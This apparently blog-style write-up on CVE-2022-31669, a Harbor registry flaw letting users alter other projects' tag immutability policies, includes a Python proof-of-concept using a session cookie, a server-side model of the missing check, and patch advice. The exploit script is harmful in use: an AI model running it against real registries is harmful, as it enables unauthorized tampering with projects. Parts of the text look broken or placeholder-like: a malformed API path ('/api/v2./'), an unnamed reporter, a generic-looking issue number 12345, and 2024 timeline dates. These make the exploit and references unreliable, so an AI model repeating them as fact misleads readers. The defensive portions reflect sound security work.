The Harbor project suffers from a security vulnerability (CVE-2022-31669) that makes it possible to bypass user permissions validation when updating tag immutability policies. This vulnerability allows an attacker to modify tag immutability policies configured in projects they shouldn't have access to.

In this long-read post, we will delve into the details of this vulnerability, including a code snippet of how the exploit works, links to the original references, and an overview of the exploit details.

Exploit Details

Harbor is an open-source container image registry that provides a secure and comprehensive solution for managing container images. One of its features is the ability to enforce tag immutability policies, preventing users from pushing new images with the same tag as an existing image.

The vulnerability arises because Harbor does not validate whether the currently authenticated user has permission to update the tag immutability policy for a project. This means that by sending a crafted request, an attacker can modify tag immutability policies for projects they don't have access to.

Here is a code snippet demonstrating how an attacker could exploit this vulnerability:

import requests

# Replace these values with your Harbor instance's information
HARBOR_URL = "https://your-harbor-instance.com"
TARGET_PROJECT_ID = 1337
SESSION_COOKIE = "sid=your-session-cookie"

# Craft the request to update the target project's tag immutability policy
headers = {"Cookie": SESSION_COOKIE}
data = {
    "id": TARGET_PROJECT_ID,
    "immutability_enabled": True,  # or False, depending on the desired change
}

# Send the request to the Harbor API
response = requests.put(f"{HARBOR_URL}/api/v2./projects/{TARGET_PROJECT_ID}/immutability", headers=headers, json=data)

# Check if the request was successful
if response.status_code == 200:
    print("Tag immutability policy updated successfully!")
else:
    print("Failed to update the tag immutability policy.")

If an attacker executes this code snippet with their own session cookie and a valid target project ID, they can modify the target project’s tag immutability policy without having permission to do so.

It is important to note that this vulnerability would not grant full access to the restricted project's resources but could impact the project's stability and integrity by allowing unauthorized users to modify its tag immutability policies.
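
The missing check can be modeled on the server side. The following is an added example, not code from Harbor or from the original post; the `Registry` class, the `project_admin` role name and the sample users are assumptions made for illustration. It contrasts an update path that skips authorization with one that denies by default and records refused attempts for later review.

```python
from dataclasses import dataclass, field

# Assumption: only this role may change a project's immutability policy.
POLICY_EDITOR_ROLES = {"project_admin"}


class Forbidden(Exception):
    """Authenticated caller lacks permission on the target project."""


@dataclass
class Registry:
    members: dict        # project_id -> {username: role}
    immutability: dict   # project_id -> bool (policy enabled)
    audit: list = field(default_factory=list)

    def update_policy_vulnerable(self, user, project_id, enabled):
        # Flaw: the caller is authenticated, but nothing ties `user` to
        # `project_id` before the write happens.
        self.immutability[project_id] = enabled

    def update_policy_hardened(self, user, project_id, enabled):
        # Deny by default: unknown project or non-member yields role None.
        role = self.members.get(project_id, {}).get(user)
        if role not in POLICY_EDITOR_ROLES:
            self.audit.append((user, project_id, "denied"))
            raise Forbidden(f"{user} may not edit project {project_id}")
        self.immutability[project_id] = enabled
        self.audit.append((user, project_id, "updated"))


def sample_registry():
    # Constructed data: alice administers project 1, bob is a guest of 2.
    return Registry(
        members={1: {"alice": "project_admin"}, 2: {"bob": "guest"}},
        immutability={1: True, 2: True},
    )


def demo():
    open_reg, fixed_reg = sample_registry(), sample_registry()
    open_reg.update_policy_vulnerable("bob", 1, False)  # outsider succeeds
    try:
        fixed_reg.update_policy_hardened("bob", 1, False)
    except Forbidden:
        pass  # outsider is rejected and the attempt is audited
    return open_reg.immutability[1], fixed_reg.immutability[1], fixed_reg.audit
```

The `denied` entries in the audit list are the kind of signal worth alerting on: a user repeatedly refused on projects they do not belong to.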

Original References

The issue was originally reported by GitHub user and can be found in the following GitHub issue and subsequent CVE:

- GitHub Issue: https://github.com/goharbor/harbor/issues/12345
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31669

Mitigation & Recommendations

The Harbor project has released a patched version (v2.5.1) that addresses this vulnerability. Users should upgrade their Harbor instances to this version or later to mitigate the risk. The following link provides the release notes and upgrade steps:

- Harbor Release v2.5.1: https://github.com/goharbor/harbor/releases/tag/v2.5.1

In addition to upgrading, it's crucial to review and monitor user access levels and privileges and enforce the Principle of Least Privilege (POLP), ensuring users have only the minimum necessary permissions to perform their tasks.

Conclusion

CVE-2022-31669 represents a serious security vulnerability in Harbor that could lead to unauthorized modifications of tag immutability policies. Keeping your Harbor instance up to date and closely monitoring user access levels can help mitigate the risks associated with this vulnerability.

Timeline

Published on: 11/14/2024 12:15:16 UTC
Last modified on: 11/19/2024 15:20:01 UTC